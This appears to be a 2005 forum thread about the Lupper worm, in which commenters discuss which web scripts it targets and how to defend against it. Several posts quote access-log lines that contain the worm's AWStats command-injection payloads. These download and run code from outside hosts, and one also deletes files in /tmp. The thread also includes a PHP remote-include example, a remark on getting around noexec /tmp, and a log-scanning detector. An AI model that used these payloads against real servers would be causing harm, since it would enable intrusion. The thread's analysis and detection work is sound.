Linux Lupper.Worm In the Wild
jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm, which also exists for BSD, just to be cross-platform. From the McAfee description: The worm blindly attacks web servers by sending malicious HTTP requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."
It doesn't say what software it tries to exploit but it does say which scripts. I'd post them here but it would be a waste of space; they're about halfway down on the McAfee page.
I'd say if your website has one of those scripts I'd look into updating or removing whatever software it is that has the vulnerability.
It's better to vote for what you want and not get it than to vote for what you don't want and get it.
- E. Debs
Athletic Scholarships to universities make as much sense as academic scholarships to sports teams.
Calling it a PHP exploit would be wrong as well. It's an exploit of specific applications written in PHP (AWStats and Drupal from what I could tell).
Bradley Holt
So here is some, shamelessly cribbed from eWeek. The worm actually attempts to attack three different web services:
"The XML-RPC hole commonly exists in blogging and Wiki programs. There are now fixes available for this hole for most systems.
AWStats is a popular, open-source log-file analyzer. Only servers which run AWStats 5.0 to 6.3 can be attacked. Versions 6.4, which came out in March, and higher are immune.
Finally, Webhints is an older script program that's designed to set up and maintain a "Hint (Quote/Tip/Joke/Whatever) of the Day" page. Version 1.3 is vulnerable to attack. There is, at this time, no known fix for the program. "
This still does not tell me which blogging/wiki programs are affected, only that "most" have fixes. More info, anyone?
Using plain ol' text since 1968
I just noticed this today, and from what I've heard here it sounds like a likely candidate. IP addresses obscured for politeness.
193.166.84 - - [04/Nov/2005:15:10:10 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:12 -0700] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:14 -0700] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 401 3787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
.
.
.
193.166.84 - - [04/Nov/2005:15:10:31 -0700] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:33 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:34 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
.
.
.
For 60 hits.
Security Focus eWeek CNet
One line blog. I hear that they're called Twitters now.
a decent description can be found here http://isc.sans.org/diary.php?storyid=823
According to this article, AWStats was patched back in February.
...Rob
The American Dream isn't an SUV and a house in the suburbs; it's Don't Tread On Me.
From the Security Focus article: Affected systems will need to be wiped and have the OS reinstalled, in most cases.
Apache usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in /tmp.
Damned slashdot eats my code examples. Re-post.
It's not a configuration of Apache, but a configuration of PHP. Basically, it's whether you allow the following:
<?php
$foo = `ls`;                                   // #1: backtick operator runs a shell command
$bar = include("http://foo.com/example.txt");  // #2: include() fetches and runs a remote file
?>
A lot of people have #1 (since they don't see the difficulty in allowing that, and in some cases it is hella-useful for hacking stuff together).
#2 is just plain dumb.
I don't remember what PHP ships with defaults nowadays (I think yes to shell commands at least), it's possible that they don't allow "http://" (remote file protocols) by default in their later releases.
--Robert
...then it's a PHP/*nix worm, not Linux specifically.
Not exactly. From what I understood, there are BSD and Linux variants: both versions are using the same PHP holes, but the binary itself must be Linux or BSD compatible.
There's a layer available in BSD that allows running Linux binaries natively, so the Linux one potentially could infect a BSD system, but it is somewhat like saying an MS-Windows virus could infect a Linux system through Wine.
Oh, and while we're at it, aren't these virii more specifically Linux/i386 and BSD/i386 virii?
I have discovered a truly marvelous proof of killer sig, which this margin is too narrow to contain.
I checked my logs and found the following:
[06/Nov/2005:18:13:39 -0500] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1030 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
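Added example, not code from any poster in this thread: a small Python scanner that applies the two access-log excerpts above (the 60-hit run of awstats.pl GETs and xmlrpc.php POSTs, and the later awstats.pl hit that fetches a.txt) as detection rules over sample log lines. It flags awstats.pl requests with a shell pipe directly after configdir=, pulls out what the injected command tries to download, and counts hits per client so a scanning host stands out. The sample lines are constructed; client IPs are documentation-range placeholders (or the obscured three-octet form used in the post), and the download hosts 192.0.2.10 and example.invalid are stand-ins, not values from the page.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format), modelled on the
# excerpts posted in this thread. Client IPs are placeholders and the download
# hosts (192.0.2.10, example.invalid) are assumptions, not data from the page.
SAMPLE_LOG = [
    '193.166.84 - - [04/Nov/2005:15:10:10 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20192%2e0%2e2%2e10%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%20192%2e0%2e2%2e10;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '193.166.84 - - [04/Nov/2005:15:10:34 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '198.51.100.7 - - [06/Nov/2005:18:13:39 -0500] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20example.invalid/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1030 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '203.0.113.5 - - [04/Nov/2005:15:12:00 -0700] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [04/Nov/2005:15:13:00 -0700] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
]

# host ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) '
)

# awstats.pl with a shell pipe right after configdir=: the command-injection
# shape seen in both posted excerpts, matched after URL-decoding.
AWSTATS_INJECTION = re.compile(r'awstats\.pl\?.*configdir=\|', re.I)
# A downloader followed by its argument, stopping at shell separators.
FETCH = re.compile(r'\b(?:wget|curl|fetch|lynx)\s+([^\s;|&]+)')


def classify(method, path, status):
    """Tags that apply to one request line; an empty list means nothing matched."""
    decoded = unquote(path)  # %3b -> ';', %2f -> '/', %2e -> '.', ...
    tags = []
    if AWSTATS_INJECTION.search(decoded):
        tags.append('awstats-configdir-injection')
        if FETCH.search(decoded):
            tags.append('download-and-execute')
    # The worm POSTs to several candidate xmlrpc.php paths. Only the misses (404)
    # can be judged from an access log: a POST to a real xmlrpc.php needs the
    # request body, which the access log does not record.
    if method == 'POST' and decoded.split('?', 1)[0].endswith('xmlrpc.php') and status == 404:
        tags.append('xmlrpc-path-scan')
    return tags


def fetched_urls(path):
    """What the injected command tries to download: useful for egress blocking."""
    return FETCH.findall(unquote(path))


def scan_log(lines):
    """Parse each line and keep only those with at least one finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined-log format; skip it
        status = int(m['status'])
        tags = classify(m['method'], m['path'], status)
        if tags:
            hits.append({'host': m['host'], 'time': m['time'], 'status': status,
                         'tags': tags, 'fetches': fetched_urls(m['path'])})
    return hits


def hits_per_host(hits):
    """Findings per client; a host with many is a scanner, not a stray hit."""
    counts = {}
    for h in hits:
        counts[h['host']] = counts.get(h['host'], 0) + 1
    return counts


if __name__ == '__main__':
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(h['time'], h['host'], h['status'], ','.join(h['tags']), h['fetches'])
    print(hits_per_host(found))
```

In a real deployment the list would be read from the access log. The status column is the part worth reading carefully: the 404/401 hits above mean the script was not there, while a 200 on an awstats-configdir-injection line is the one to treat as a probable compromise, since the command in the query string would have run.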
Why not get somebody to shut down members.lycos.co.uk/sugi/a.txt??
Well, as of 9:30 AM central time 24.224.174.18 isn't accepting connections, so it's either been slashdotted or taken down.
My web server logs for my home machine are full of attempts to exploit these holes, coming from a large number of IP addresses.
This indicates that this is indeed in the wild, and active, and spreading.
Thus, it is not alarmist shit.
a noexec /tmp doesn't protect from running an interpreter with the script source in /tmp. Next version should simply include '/bin/sh /tmp/listen' instead to be fully functional.
I'll step in just for giggles: Category Error
Stating on Slashdot that I like cheese since 1997.
You need to link to that page from the original virus description... then it works fine.
man, I feel like mold.
Um, AWStats isn't written in PHP, but in Perl. This isn't a PHP worm, it's a CGI exploit which happens to target PHP apps, plus the occasional Perl app.
Need a Linux consultant in New Orleans?
Per Making /tmp non-executable:
What you need is defense in depth. Mounting /tmp noexec,nosuid helps; keeping everything up-to-date helps; scanning your log files, following the news... You get the idea.
And of course, hiring someone competent to do all this is a fine idea;)
Mounting tmp noexec won't stop scripts like this.
Aside from keeping a system patched up, it's important on a web server to lock down all programs that aren't necessary for the operation of your web services. In typical setups there is absolutely no reason that the apache user should have to execute wget, although it will be able to by default.